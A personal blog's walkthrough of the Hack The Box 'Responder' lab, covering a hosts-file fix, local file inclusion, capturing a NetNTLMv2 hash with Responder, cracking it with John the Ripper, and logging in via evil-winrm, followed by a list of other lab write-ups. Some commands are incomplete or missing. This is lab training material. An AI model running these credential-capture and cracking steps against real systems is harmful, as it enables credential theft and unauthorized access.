The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks

The Be Sure Blog banner

Responder: Crack the password hash and login as admin

posted on 16.5.2023 by Below Surface in "Hack The Box"

A short note because I struggled a lot to fix this issue, so I want to mention it here before we start:

For this task it is necessary to modify the hosts file of the machine which is used to open the website of the task. I did it correctly, but the issue still persisted, that no website would load. The problem (which was no problem in any task before) was, that I run Kali Linux on a VirtualBox and I had the VPN run on the windows machine. The fix for my problem was, to run the VPN from the Kali VM. May this hint help someone with the same issue!

Time to pwn. Let's scan for open ports (exchange ip with your machines IP address):

nmap -v -Pn ip

We see that port 80 is open. So let's paste the ip into a browser. We get redirected to the url unika.htb, but no website loads "We can’t connect to the server at unika.htb". Time to modify the hosts file:

sudo nano /etc/hosts

After the 127.... addresses, add a new line:

ip unika.htb
// in my case: unika.htb

Then hit ctrl + o and then enter to save the file. Then hit ctrl + x to exit the text editor. Open the IP address or url (unika.htb) in your browser (the Kali VM in my case), and the website should load now!

Now we test if LFI (Local File Inclusion) works on the target machine with:


You will see the content of the hosts file in the response, so LFI works. We also know that it's a Windows machine and we will try to capture the NetNTLMv2 when Windows tries to authenticate to our machine when we use SMB. For this the Responder tool is used.

First, check if SMB is turned on:

cd /usr/share/responder
cat Responder.conf

Should output (scroll up):

[Responder Core]

; Servers to start SQL = On SMB = On ... HTTP = On

SMB is on (good), but HTTP is on as well and this will make the next operation impossible, because port 80 is already used by another service on the machine. Let's turn HTTP off:

sudo nano Responder.conf

Change HTTP to "Off". Then hit ctrl + o and then enter to save the file and then ctrl + x to close the editor. Running the command

sudo python3 -I tun0

And then scrolling up, should confirm that HTTP server is off now

    HTTP server                [OFF]
    HTTPS server               [ON]

Keep this terminal open, and open another one. Run:

ip a

And copy the "inet" IP without the /xx at the end of "tun0". Now exchange ip with the ip that you copied:


When running this URL in the browser, an event should pop up in the terminal where Responder is running. Time to crack the NTMLv2-SSP Hash, which should be displayed there! Copy and paste it into a file, like hash.txt.

If you did not use John the Ripper before, you may need to unzip the rockyou.txt file now:

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

Then, when navigated in the same directory with your hash.txt file, run

john -w=/usr/share/wordlists/rockyou.txt hash.txt

We got the password! Now we connect to the WinRRM service on the target and try to get a session. Exchange ip with the machines IP address.

evil-winrm -i ip -u administrator -p badminton

Then navigate to C:\Users\mike\Desktop and run

cat flag.txt

To get the flag.


hack the box
local file inclusion
john the ripper


More posts of this category

Meow: How to pwn the machine (Nmap, Telnet)

Use nmap and telnet to get the flag

Hack The Box

Fawn: Pwn the machine (FTP)

Find the open FTP port and extract the flag!

Hack The Box

Dancing: Pwn the machine (SMB)

How to retrieve the flag with SMB (Server-Message-Block)

Hack The Box

Redeemer: Pwn the machine and capture the flag (Redis)

How to get the flag from the Redis database

Hack The Box

Appointment: Use SQL-Injection to pwn the machine

How to extract the flag by logging in without a password

Hack The Box

Sequel: Access a MariaDB instance with default credentials

Scan for the open ports, log into the database and get the flag!

Hack The Box

Crocodile: Capture the flag! (FTP, Gobuster)

Get credentials via the open FTP port and use Gobuster to find the login file

Hack The Box

Three: Get a reverse shell via AWS S3

Use Nmap, Gobuster, Ncat, PHP and the AWS CLI to capture the flag

Hack The Box

Archetype: From user to admin

Make good use of nmap, smbclient, mssqlclient, xp_cmdshell, winPEAS & psexec

Hack The Box

Oopsie: Modify the login cookie, escalate privileges and get the flag!

Upload a PHP reverse shell, get user and then root privileges to pwn the machine

Hack The Box

Vaccine: Pwn the machine (zip2john, hashcat, sqlmap)

Crack the .zip archive, use sql injection and escalate your privileges to get the flags

Hack The Box

Unified: Exploit Log4j, modify a MongoDB entry and get the flags

Log4j exploitation, HTTP request modification & privilege escalation

Hack The Box

Explosion: Use xfreerdp to connect to the service

Make use of the poorly configured service and get the flag

Hack The Box

Preignition: Use Gobuster and default credentials

Gobuster is used to find the login page of the server by dir busting

Hack The Box

Mongod: Use the MongoDB cli to get the flag

MongoDB is a NoSQL database. Use the mongo cli to pwn the machine

Hack The Box

Synced: Use Rsync to browse public shares

Rsync is a fast file copying tool. We will use it to download the flag

Hack The Box

Ignition: Use Gobuster and a common used password

Modify the hosts file, do dir busting and try common passwords to get the flag

Hack The Box

Bike: Exploit a Node.js template engine vulnerability

Insert malicious code to leave the sandbox and get the flag!

Hack The Box

Funnel: Use local port forwarding to access the PostgreSQL DB

Since we can't interact with the DB directly, we use tunneling

Hack The Box

Pennyworth: Remote command execution vulnerability

Default credentials help us to execute Groovy Script code to get a reverse shell

Hack The Box

Tactics: Get the flag via Samba Client or

Browse the Windows shares with default credentials and extract the flag

Hack The Box

Included: Local file inclusion, reverse shell and privilege escalation

Use TFTP, get a reverse shell, build and upload an Alpine image with root

Hack The Box

Markup: Use XXE Injection and privilege escalation to get the flag

Nmap, BurpSuite, Ncat, default credentials and misconfigurations

Hack The Box

Base: PHP Type Juggling, Arbitrary File Upload, clear text credentials

Use BurpSuite, Netcat, SSH, Gobuster and PHP to get a reverse shell

Hack The Box

Sau: Use Server Side Request Forgery to pwn the machine

Exploit known vulnerabilities and capture the flags

Hack The Box

Pilgrimage: Use various exploits to get the two flags

Git Repo Dump, Arbitrary File Read, Remote Code Execution

Hack The Box

Topology: Use LaTeX Injection and Hashcat

Get the credentials and crack the password hash to get the flags

Hack The Box

MonitorsTwo: Use two exploits, crack the BCrypt hash and escalate privileges

Get a reverse shell, break out of a Docker container and get the flags

Hack The Box